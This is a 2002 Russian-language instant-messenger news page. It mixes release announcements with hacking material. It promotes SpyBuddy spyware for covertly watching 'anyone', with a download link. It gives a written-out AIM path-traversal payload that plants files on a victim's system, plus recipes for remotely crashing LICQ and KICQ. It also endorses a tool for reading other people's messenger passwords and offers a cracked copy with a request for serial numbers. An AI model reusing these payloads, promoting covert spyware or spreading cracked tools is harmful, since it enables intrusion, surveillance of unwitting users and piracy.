2002a Beta Build #3727 Updated Friday, April 19th.
Понедельник, 5 августа 2002 г.Просмотров: 488
Подписаться на комментарии по RSS
Стала доступной для скачивания ася 2002a Beta Build #3727. Качаем тут, а ссылки на патчи шлём вот на этот мыльник]]] pin@ru.ru (просьба слать только ссылки где можно скачать патч ящик небездонный).
Новая версия интернет-пейджера Kopete 0.3 для Linux/KDE
Понедельник, 5 августа 2002 г.Просмотров: 488
Подписаться на комментарии по RSS
Разработчики менеджера рабочего стола KDE для Linux выпустили новую версию интернет-пейджера Kopete 0.3. Программа позволяет подключаться к нескольким сетям обмена мгновенными сообщениями.
Для каждой сети используется отдельный плагин. Для поддержки нового протокола (или, как вариант, для спасения от борьбы AOL с вражескими программами) достаточно изготовить и подключить новый плагин.
Вместе с программой поставляется ряд плагинов для основных сетей обмена сообщениями, в том числе для сетей ICQ и MSN. Скачать новую версию утилиты можно здесь
КИТ и WebMoney Transfer объявили о запуске нового платежного сервиса Paymer
Понедельник, 5 августа 2002 г.Просмотров: 496
Подписаться на комментарии по RSS
Компания "Компьютерные и информационные технологии" (КИТ) совместно с системой WebMoney Transfer объявили о запуске новой, универсальной системы мгновенных расчетов Paymer.
В качестве расчетного средства в системе используются цифровые чеки, передаваемые между пользователями любым удобным для них способом: с помощью электронной почты, ICQ, факса или обычного телефона.
Сообщая партнеру реквизиты чека Paymer, пользователь системы совершает расчетную операцию, сопровождающуюся передачей чека его новому владельцу. При этом ни с получателя, ни с отправителя не взимается комиссии. Таким образом, чеки Paymer многократно передаются от одного владельца другому в любой доступной для контактов среде, не теряя своей цифровой ценности.
Чеки Paymer могут использоваться для расчетов за онлайн-товары и услуги, предоставляемые различными интернет-магазинами, торговыми площадками, информационными ресурсами и другими сетевыми сервисами, а также для оплаты любых товаров и услуг, предоставляемых вне Сети. Чеки являются наиболее простым решением во всех случаях, когда заинтересованные стороны не имеют непосредственного контакта, но должны быть уверены в мгновенности передачи расчетных средств.
На данный момент цифровая ценность чеков обеспечивается средствами, зарезервированными на кошельках WebMoney Transfer. Вместе с тем система Paymer открыта для взаимодействия с платежными сервисами, кредитными организациями, а также любыми компаниями, желающими обеспечить выпуск собственных расчетных инструментов и готовыми предоставить для этих целей гарантированное обеспечение имеющимися в их распоряжении активами.
SpyBuddy 1.5 - удобная программа для шпионажа за пользователем компьютера
Понедельник, 5 августа 2002 г.Просмотров: 517
Подписаться на комментарии по RSS
SpyBuddy - неплохое решение для слежки за пользователями компьютера: детьми, сотрудниками, да кем угодно. Программа фиксирует всё, что делает пользователь и записывает собранную информацию в лог-файл.
Одна из уникальных возможностей SpyBuddy - способность перехвата и сохранения переписки пользователя, использующего AOL/ICQ/MSN/AIM. "Шпион" может также сохранять информацию о посещенных веб-сайтах, открытых окнах, запущенных приложениях, распечатанных документах, информации, скопированной в буфер обмена. Интересная возможность - создание снимков с экрана пользователя через определенные интервалы времени.
Если вы хотите следить за пользователем, но не имеете ежедневного доступа к его компьютеру, SpyBuddy сможет отправлять все лог-файлы по электронной почте.
Программа имеет статус Shareware. Стоимость регистрации составляет 50 долл. Скачать ее можно [ahref="http://tucows.rinet.ru/files3/spybuddy-setup-sw.exe]отсюда.[/link]
Произвольное создание файлов в AOL Instant Messenger
Понедельник, 5 августа 2002 г.Просмотров: 472
Подписаться на комментарии по RSS
Уязвимость в AOL Instant Messenger позволяет AIM пользователю сохранять файлы в произвольном местоположении. Файл (содержит тег IMG и тэг data), передающийся при прямом соединении между AIM пользователями, будет при получении записан в temp каталог и выполнен оттуда. Включение последовательности символов '.. \ ' в параметр SRC тэга img позволяет пользователю сохранять файл в любом другом каталоге. Пример:
[textarea name="textfield" cols="60" rows="6]<HTML><BODY>Hey, what's up?<IMG
SRC="\..\system\johnny.important_file" HEIGHT="0"
WIDTH="0" DATASIZE="50"
ID="1"></BODY></HTML><BINARY><DATA
ID=1">***WAVE FILE DATA
HERE***</DATA></BINARY> [/textarea]
Уязвимость найдена в AOL Instant Messenger 4.0-4.7
Ну вот расскажу Вас ещё об одной ошибке, связанной с клиентами ICQ. На этот раз она была найдена не в так широко используемом LICQ. Хотя общий смысл её мало понятен, всё равно считаю, что для общего развития знать о данном баге необходимо.
Установите с кем-нибудь чат ("icq chat" среди владельцев LICQ. Теперь нужно осуществить процесс отправки постоянного потока %d (достаточно около 1000 символов). У владельца LICQ программа вылетит с ошибкой.
Тестирование осуществлялось на: licq 1.0.4.
Licq Segmentation Violation Detected.
Backtrace:
licq(licq_handle_sigsegv+0x73) [0x809171b]
/lib/libpthread.so.0(pthread_kill+0x170) [0x4002deb4]
/lib/libc.so.6(__libc_sigaction+0x1f8) [0x400ce928]
licq(PopChatEvent__12CChatManager+0xab) [0x808ab2b]
/usr/local/lib/licq/licq_qt-gui.so(slot_chat__7ChatDlg+0xea6) [0x401fb68a]
/usr/lib/libqt.so.2(activate_signal__7QObjectPCci+0x12a) [0x40448b7e]
/usr/lib/libqt.so.2(activated__15QSocketNotifieri+0x28) [0x4049a0b8]
/usr/lib/libqt.so.2(event__15QSocketNotifierP6QEvent+0x44) [0x4047b07c]
/usr/lib/libqt.so.2(notify__12QApplicationP7QObjectP6QEvent+0x1ea) [0x403f88a6]
/usr/lib/libqt.so.2(qt_set_socket_handler__FiiP7QObjectb+0x4f2) [0x403c685a]
/usr/lib/libqt.so.2(processNextEvent__12QApplicationb+0x6c7) [0x403c6f9b]
/usr/lib/libqt.so.2(enter_loop__12QApplication+0x3c) [0x403fa5f4]
/usr/lib/libqt.so.2(exec__12QApplication+0x2b) [0x403c68c7]
/usr/local/lib/licq/licq_qt-gui.so(Run__8CLicqGuiP10CICQDaemon+0xf9) [0x402070ed]
/usr/local/lib/licq/licq_qt-gui.so(LP_Main+0x4d) [0x40205475]
/usr/local/lib/licq/licq_qt-gui.so(LP_Main_tep+0x21) [0x40205191]
/lib/libpthread.so.0(pthread_detach+0x519) [0x4002b065]
/lib/libc.so.6(__clone+0x3a) [0x4016d01a]
Attempting to generate core file.
syn@slackware:~#
Вот собственно и вся имеющаяся у меня информация на этот счёт.
Удалённая атака на KICQ 2.0.0b1
Понедельник, 5 августа 2002 г.Просмотров: 472
Подписаться на комментарии по RSS
KICQ - это клиент, который был специально разработан для KDE. Уязвимость найдена в KICQ 2.0.0b1 использующей icqlib 1.0.0, а вот собственно говоря и само описание ошибки:
Для того, чтобы удалённо "повалить" KICQ, достаточно просто подсоединиться используя протокол telnet на порт, на котором работает KICQ и послать на него немного мусора:
bash-2.05$ telnet 10.0.0.1 1030
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
.... мусор ....
Connection closed by foreign host.
Клиент вылетит примерно со следующим сообщением:
KCrash: crashing.... crashRecursionCounter = 2
KCrash: Application Name = kicq path = [unknown]
На настоящее время необходимых патчей не находил. Возможно, стоит обратиться на сайт разработчика: http://sourceforge.net/projects/kicq
Advanced Instant Messengers Password Recovery
Понедельник, 5 августа 2002 г.Просмотров: 481
Подписаться на комментарии по RSS
Приветствую всех любителей аськи. Сегодня я хотел бы поведать вам о проге, которую незаслуженно обошли вниманием. Софтинка сия называется Advanced Instant Messengers Password Recovery или кратко AIMPR. Официальный сайт находится по адресу http://elcomsoft.com/aimpr.html. Выпускает ее печально известная компания ElcomSoft. Программа представляет собой средство для восстановления своих паролей или соответсвенно для исследования чужих. Среди особенностей, которые отличают ее от аналогов можно отметить то, что она подбирает пароли не только ко всем версиям аськи, но и к абсолютному большинству аськиных конкурентов. Версия 1.30, которая является последней на момент написания статьи может показать пароли для следующих мессенджеров: ICQ, AOL IM, Yahoo! Messenger, MSN Messenger, Excite Messenger, Odigo, Trillian, AT&T IM Anywhere, T-Online Messenger, Match Messenger, Praize IM, ScreenFIRE, ACD Express Comunicator, Imici Messenger, Prodigy IM, PowWow Messenger, Jabber IM, Kellster IM, PalTalk, Indiatimes messenger, Miranda, Tiscali. Как видите здесь есть не только все известные болталки, но и те, о которых вы никогда не слышали. Также к достоинствам можно отнести стабильность, скорость и маленький размер данной софтины - около 200 кб. Безусловно программка относится к разряду MustHave. Но имеет один существенный недостаток. За нее хотят деньги. Самой новой версией, для которой удалось найти серийник, является 1.21. (Если у кого-нибудь есть серийный номер к более поздним версиям, присылайте и ваш труд не останется незамеченным). Отличий от версии 1.30 не очень много. Вы можете ознакомиться с ними здесь. В этом архиве находится AIMPR 1.21 вместе с reg файлом и описанием. Надо сказать это хозяйство прекрасно устанавливается на дискету. И быстро выполняет свои функции. Выводы делайте сами
[от Feathery] ) Да-да! Точно ) ОООО-О-о-очень крутая прога от Элкомсофта ))
[re: from Stranix] А ты аську выключи и по новой попробуй. Прога не вскрывает дат файл, используемый в данный момент, во избежание конфликта. Что касается Pass Finder'a на скриншоте... дык сам себя не похвалишь - никто не похвалит)).
привет физ.....вот там на форуме многие жаждут I Seek E-Mail версии 3.0 .
Ну вот решил выложить